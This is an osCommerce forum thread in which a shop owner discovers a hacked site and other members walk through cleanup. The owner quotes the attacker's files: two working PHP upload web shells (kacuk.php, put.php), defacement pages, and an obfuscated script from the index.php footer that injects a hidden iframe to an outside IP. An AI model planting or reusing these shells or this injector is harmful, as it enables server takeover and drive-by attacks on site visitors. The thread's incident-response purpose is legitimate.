Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Error in a homepage


Racing Club

Recommended Posts

hello

 

I have a problem.

 

From 1 day to another my web change. Before it worked fine. But now I see this message on the homepage and the admin:

 

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

 

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26

 

----------------------------------------------

 

Line 35: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

 

Line 26: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

 

Please help.

 

Thanks

 

I use version v2.2RC2a of oscommerce

Link to comment
Share on other sites

Ariel,

 

check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.

 

 

 

 

Chris

Link to comment
Share on other sites

Thanks for replying

 

index.php of homepage:

 

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

// the following cPath references come from application_top.php

$category_depth = 'top';

if (isset($cPath) && tep_not_null($cPath)) {

$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");

$cateqories_products = tep_db_fetch_array($categories_products_query);

if ($cateqories_products['total'] > 0) {

$category_depth = 'products'; // display products

} else {

$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");

$category_parent = tep_db_fetch_array($category_parent_query);

if ($category_parent['total'] > 0) {

$category_depth = 'nested'; // navigate through the categories

} else {

$category_depth = 'products'; // category has no products, but display the 'no products' message

}

}

}

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

 

index.php of admin:

 

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2007 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

$languages = tep_get_languages();

$languages_array = array();

$languages_selected = DEFAULT_LANGUAGE;

for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {

$languages_array[] = array('id' => $languages[$i]['code'],

'text' => $languages[$i]['name']);

if ($languages[$i]['directory'] == $language) {

$languages_selected = $languages[$i]['code'];

}

}

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

Link to comment
Share on other sites

Ariel,

 

Are you sure you didn't make recent changes to accommodate additional language support ?

 

In the index.php, this:

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

 

Should be this:

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

?>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

 

 

NOTE the ?> BEFORE the doctype line ? It is also missing in your /admin/index.php and the language code

 

$languages = tep_get_languages();

$languages_array = array();

$languages_selected = DEFAULT_LANGUAGE;

for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {

$languages_array[] = array('id' => $languages[$i]['code'],

'text' => $languages[$i]['name']);

if ($languages[$i]['directory'] == $language) {

$languages_selected = $languages[$i]['code'];

}

}

 

is not standard in the default download.

 

 

 

 

Chris

Link to comment
Share on other sites

Ariel,

 

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

 

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

// the following cPath references come from application_top.php

$category_depth = 'top';

if (isset($cPath) && tep_not_null($cPath)) {

$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");

$cateqories_products = tep_db_fetch_array($categories_products_query);

if ($cateqories_products['total'] > 0) {

$category_depth = 'products'; // display products

} else {

$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");

$category_parent = tep_db_fetch_array($category_parent_query);

if ($category_parent['total'] > 0) {

$category_depth = 'nested'; // navigate through the categories

} else {

$category_depth = 'products'; // category has no products, but display the 'no products' message

}

}

}

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

?>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS; ?>>

<head>

 

 

Chris

Link to comment
Share on other sites

It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.

 

 

 

Chris

Link to comment
Share on other sites

You have hack files all over in the images folder.

:o

 

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Recently I started to see the images folder and I found this (as you are saying):

 

ina.htm: HACKED BY <h4> <center> kaMtiEz </ h4> </ center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </ h4> </ center>

 

indonesia.htm: <html><head>

 

 

 

<title>Hacker Indonesia</title><style type="text/css">

 

html, body {

 

color: white;

 

background-color: #000080;

 

}

 

 

 

a {

 

background-color: transparent;

 

color: #ffffff;

 

}

 

 

 

#p404 {

 

position: absolute;

 

top: 20%;

 

left: 0px;

 

width: 100%;

 

height: 1px;

 

overflow: visible;

 

visibility: visible;

 

display: block;

 

}

 

 

 

#content {

 

margin-left: -320px;

 

position: absolute;

 

top: -100px;

 

left: 50%;

 

width: 640px;

 

height: 200px;

 

visibility: visible;

 

}

 

 

 

#errormessage {

 

font: 50px garamond;

 

line-height: 200%;

 

text-align: center;

 

}

 

 

 

#title, #footer {

 

text-align: center;

 

}

 

 

 

#title span {

 

background-color: #c0c0c0;

 

color: #000080;

 

}

 

</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>

 

<div id="p404">

 

<div id="content">

 

<div id="errormessage">

 

<p>Hacked by Hmei7</p>

 

</p>

 

</div>

 

</div>

 

</div>

 

</body></html>

 

kacuk.php: ==kacuk

 

<?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?>

 

==

 

x.htm: <b><font size="5">by iskorpitx</font></b>

 

 

(I'm not sure)

put.php: <?php

 

echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';

 

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

 

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

 

if( $_POST['_upl'] == "Upload" ) {

 

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }

 

else { echo '<b>Upload Fail !!!</b><br><br>'; }

 

}

 

?>

 

----------------------------------

 

 

I'll keep the advice you gave me on "Securing the ADMIN.

but Can I get my website as it was before?

What should I do?

Link to comment
Share on other sites

Ariel,

 

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) [Removed].

 

 

 

Chris

Link to comment
Share on other sites

I delete this files from the images folder:

 

ina.htm

indonesia.htm

kacuk.php

x.htm

put.php

 

 

In point 2 where you asked me to find these keywords:

eval base64 decode

 

At those words found in a few files called:

googleff7fe2850f15ebd7.php

googlebc44d7671aae3b3e.php

google7a14fb0c01e4e5d1.php

 

What should I do?

Link to comment
Share on other sites

Those are all hack files.

 

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

 

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove and and all php files from the images folder.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Jan,

 

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help ? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.

 

 

 

For the record, here is #10 on the list again:

 

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

I welcome your response here in the forum, so everyone can see it.

 

 

 

Chris

Link to comment
Share on other sites

At the footer of the index.php I found this:

 

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var ucyq=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var vpm=r.cssRules||r.rules;for(var lqf=0;lqf<vpm.length;lqf++){var gl=vpm.item?vpm.item(lqf):vpm[lqf];if(!gl.selectorText.match(/#va/))continue;qq=(gl.cssText)?gl.cssText:gl.style.cssText;ucyq=qq.match(/(S[^")]+)/)[1];zio=gl.selectorText.substr(1);};}catch(e){};}oe=new Date(2010,11,3,2,21,4);t=oe.getSeconds();var vo=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var fme="";var g=function(){return this;}();tevq=g["e"+zio+"l"];var cet="";hj=tevq(ucyq);for(var i=0;i<vo.length;i++){aig=tevq(vo);cet+=hj(aig);}tevq(cet);</script>

 

I already removed and now I'm adding this:

?>

because it is missing several lines.

 

I'll report how I progress.

 

Thanks!

 

I was slow to respond because I spent the whole afternoon removing a virus in my computer

Link to comment
Share on other sites

Ariel,

 

If you are seeing other URL's in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags.

 

 

 

 

Chris

Link to comment
Share on other sites

That only happens when I open my website with Internet Explorer with Mozilla Firefox does not happen.

 

Someone could go to my website and see if the same please

 

Thanks

Link to comment
Share on other sites

Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

 

 

 

Chris

Link to comment
Share on other sites

Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

Chris

 

What do you see?

 

because I delete temp files and cookies and I keep seeing the same thing

 

Thanks!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...